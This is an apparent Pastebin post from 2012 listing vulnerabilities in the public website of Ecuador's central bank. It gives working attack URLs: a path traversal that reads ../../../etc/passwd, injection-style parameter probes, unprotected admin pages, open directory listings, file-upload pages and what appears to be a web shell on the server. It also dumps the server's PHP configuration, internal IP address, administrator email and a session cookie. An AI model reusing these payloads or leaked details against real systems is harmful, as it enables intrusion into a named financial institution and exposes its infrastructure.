Advertisement
Yei_zeta

Banco Central del Ecuador Comprobando la seguridad

Nov 29th, 2012
240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.18 KB | None | 0 0
  1. BANCO CENTRAL DE ECUADOR <(SEGURIDAD YEI ZETA)>
  2.  
  3. VULS:
  4.  
  5.  
  6. http://www.bce.fin.ec/frame.php?CNT=ARB0000782%C2%B4%C2%B4
  7. http://www.bce.fin.ec/files.php?file=../../../etc/passwd
  8. http://www.bce.fin.ec/home1/pizarra/datos_tasas_pizarra.php?fecha=2005-04-06&fec_cierre=&id_tabla=&indicador=1%C2%B4%C2%B4
  9.  
  10.  
  11. Accesos A Pages con terminos ("PHP") :>Sin (PASSWORD)
  12.  
  13. http://www.bce.fin.ec/admin/admin/
  14.  
  15. arbol.php
  16. contenido.php
  17. del_articulo.php
  18. del_capitulo.php
  19. insert_art.php
  20. insert_cap.php
  21. insert_par.php
  22. insert_pdf.php
  23. new_articulo.php
  24. new_capitulo.php
  25. new_parrafo.php
  26. new_pdf.php
  27. nuevo_arbol.php
  28. nuevo_contenido.php
  29.  
  30. DIRECTORIOS LISTERIN
  31.  
  32. http://www.bce.fin.ec/admin/
  33.  
  34.  
  35. Parent Directory
  36. actividad.php
  37. admReportes.php
  38. admin/
  39. arbol.php
  40. contenido.php
  41. del_articulo.php
  42. del_capitulo.php
  43. dirlistABP.php
  44. dirlistCIE.php
  45. dirlistEBC.php
  46. dirlistECT.php
  47. dirlistEEI.php
  48. dirlistEFA.php
  49. dirlistEOE.php
  50. dirlistETC.php
  51. dirlistGLI.php
  52. dirlistInflacion.php
  53. dirlistMLE.php
  54. dirlistPEF.php
  55. dirlistSIE.php
  56. dirlistTasas.php
  57. dirlistTasasDPI.php
  58. dirlistVIA.php
  59. fun_noticia_bce.php
  60. gyeEncuestasIP.php
  61. insert_art.php
  62. insert_cap.php
  63. insert_par.php
  64. insert_pdf.php
  65. new_articulo.php
  66. new_capitulo.php
  67. new_parrafo.php
  68. new_pdf.php
  69. noticia.php
  70. nuevo_arbol.php
  71. nuevo_contenido.php
  72. sql_sentences.php
  73. tasas.php
  74.  
  75.  
  76. UPLOAD ARCHIVOS
  77.  
  78. http://www.bce.fin.ec/home1/ftp/carga.php
  79.  
  80. TYPE SHELL:
  81.  
  82. http://www.bce.fin.ec/home1/ftp/rasim.php?op=edit&file=carga.php
  83.  
  84. upload html
  85.  
  86. http://www.bce.fin.ec/home1/ftp/ftp.php.bk
  87.  
  88. CARGAR 2
  89.  
  90. http://www.bce.fin.ec/home1/ftp/carga.jsp
  91.  
  92. LISTEN DIN
  93.  
  94. http://www.bce.fin.ec/home1/
  95.  
  96. Parent Directory
  97. *
  98.  
  99. MercadosInternacionales/
  100. actividades/
  101. bce/
  102. busqueda/
  103. certificacion/
  104. cultura/
  105. dv.jsp
  106. economia/
  107. encuestas/
  108. estadisticas.bk/
  109. estadisticas/
  110. ftp/
  111. imagenes/
  112. indicesBursatiles/
  113. mercFinancieros/
  114. noticias/
  115. pizarra/
  116. previsiones/
  117. publicaciones/
  118. sbinternacionales.zip
  119. sbinternacionales/
  120. sisfin/
  121. sisfinanciero/
  122. ticker/
  123. tlc.2005-07-22/
  124. tlc/
  125. transparencia/
  126. wwwisis/
  127.  
  128. FTP
  129.  
  130.  
  131. System SunOS bceqsbtp3z4 5.10 Generic_144488-09 sun4v
  132. Build Date Sep 26 2011 02:58:40
  133. Configure Command './configure' '--prefix=/usr/local/php' '--with-config-file-path=/usr/local/php/lib' '--with-libxml-dir=/usr/local' '--with-zlib=/usr/local' '--with-xpm-dir=/usr/local' '--with-mysql=/usr/local/mysql' '--with-mysqli=/usr/local/mysql/bin/mysql_config' '--with-apxs2=/usr/local/apache2/bin/apxs' '--without-pgsql' '--with-jpeg-dir=/usr/local/lib' '--with-zlib-dir=/usr/local/lib' '--with-gd=/usr/local' '--enable-mbstring' '--enable-shared' '--enable-exif' '--enable-sockets' '--enable-soap' '--with-png-dir=/usr/local/lib' '--with-curl=/usr/local' '--with-ldap=/usr/local' '--with-openssl=/usr/local/ssl' '--with-gettext' '--with-pcre-dir=/usr/local' '--with-freetype-dir=/usr/local' '--with-mssql=/usr/local/freetds'
  134. Server API Apache 2.0 Handler
  135. Virtual Directory Support disabled
  136. Configuration File (php.ini) Path /usr/local/php/lib
  137. Loaded Configuration File (none)
  138. Scan this dir for additional .ini files (none)
  139. Additional .ini files parsed (none)
  140. PHP API 20090626
  141. PHP Extension 20090626
  142. Zend Extension 220090626
  143. Zend Extension Build API220090626,NTS
  144. PHP Extension Build API20090626,NTS
  145. Debug Build no
  146. Thread Safety disabled
  147. Zend Memory Manager enabled
  148. Zend Multibyte Support disabled
  149. IPv6 Support enabled
  150. Registered PHP Streams https, ftps, compress.zlib, php, file, glob, data, http, ftp, phar
  151. Registered Stream Socket Transports tcp, udp, unix, udg, ssl, sslv3, sslv2, tls
  152. Registered Stream Filters zlib.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk
  153.  
  154. This program makes use of the Zend Scripting Language Engine:
  155. Zend Engine v2.3.0, Copyright (c) 1998-2011 Zend Technologies
  156.  
  157. PHP Credits
  158.  
  159. Configuration
  160.  
  161. apache2handler
  162.  
  163. Apache Version Apache
  164. Apache API Version 20051115
  165. Server Administrator uioinf-cendat@bce.ec
  166. Hostname:Port www.bce.fin.ec:80
  167. User/Group apache(9001)/900
  168. Max Requests Per Child: 10000 - Keep Alive: on - Max Per Connection: 100
  169. Timeouts Connection: 300 - Keep-Alive: 5
  170. Virtual Server No
  171. Server Root /usr/local/apache2
  172. Loaded Modules core prefork http_core mod_so mod_authn_file mod_authn_dbm mod_authn_anon mod_authn_dbd mod_authn_default mod_authz_host mod_authz_groupfile mod_authz_user mod_authz_dbm mod_authz_owner mod_authnz_ldap mod_authz_default mod_auth_basic mod_auth_digest mod_dbd mod_dumpio mod_reqtimeout mod_ext_filter mod_include mod_filter mod_substitute mod_deflate util_ldap mod_log_config mod_log_forensic mod_logio mod_env mod_mime_magic mod_cern_meta mod_expires mod_headers mod_ident mod_usertrack mod_unique_id mod_setenvif mod_version mod_proxy mod_proxy_connect mod_proxy_ftp mod_proxy_http mod_proxy_scgi mod_proxy_ajp mod_proxy_balancer mod_ssl mod_mime mod_dav mod_status mod_autoindex mod_asis mod_info mod_cgi mod_dav_fs mod_vhost_alias mod_negotiation mod_dir mod_imagemap mod_actions mod_speling mod_userdir mod_alias mod_rewrite mod_php5 mod_caucho
  173.  
  174. Directive Local Value Master Value
  175. engine 1 1
  176. last_modified 0 0
  177. xbithack 0 0
  178.  
  179. Apache Environment
  180.  
  181. Variable Value
  182. UNIQUE_ID ULgpeKwcAjgAACKp7VgAAAAF
  183. HTTP_HOST www.bce.fin.ec
  184. HTTP_CONNECTION keep-alive
  185. HTTP_USER_AGENT Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.91 Safari/537.11
  186. HTTP_ACCEPT text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  187. HTTP_REFERER http://www.bce.fin.ec/home1/ftp/
  188. HTTP_ACCEPT_ENCODING gzip,deflate,sdch
  189. HTTP_ACCEPT_LANGUAGE es-ES,es;q=0.8
  190. HTTP_ACCEPT_CHARSET ISO-8859-1,utf-8;q=0.7,*;q=0.3
  191. HTTP_COOKIE PHPSESSID=1bfec2013157d216ea3ec8438f508c98
  192. PATH .:/usr/local/comandos:/usr/sbin:/usr/bin:/usr/sfw/bin:/usr/ccs/bin:/usr/local/mysql/bin:/usr/local/php/bin:/usr/perl5/bin
  193. SERVER_SIGNATURE no value
  194. SERVER_SOFTWARE Apache
  195. SERVER_NAME www.bce.fin.ec
  196. SERVER_ADDR 172.28.2.56
  197. SERVER_PORT 80
  198. REMOTE_ADDR 200.8.23.134
  199. DOCUMENT_ROOT /usr/local/Web_Seguro/resin/doc/BCE
  200. SERVER_ADMIN uioinf-cendat@bce.ec
  201. SCRIPT_FILENAME /usr/local/Web_Seguro/resin/doc/BCE/home1/ftp/ftp.php
  202. REMOTE_PORT 3414
  203. GATEWAY_INTERFACE CGI/1.1
  204. SERVER_PROTOCOL HTTP/1.1
  205. REQUEST_METHOD GET
  206. QUERY_STRING no value
  207. REQUEST_URI /home1/ftp/ftp.php
  208. SCRIPT_NAME /home1/ftp/ftp.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement